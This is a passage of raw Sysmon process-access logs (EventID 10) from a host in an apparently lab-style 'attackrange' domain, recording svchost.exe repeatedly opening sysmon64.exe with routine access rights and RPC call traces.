05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 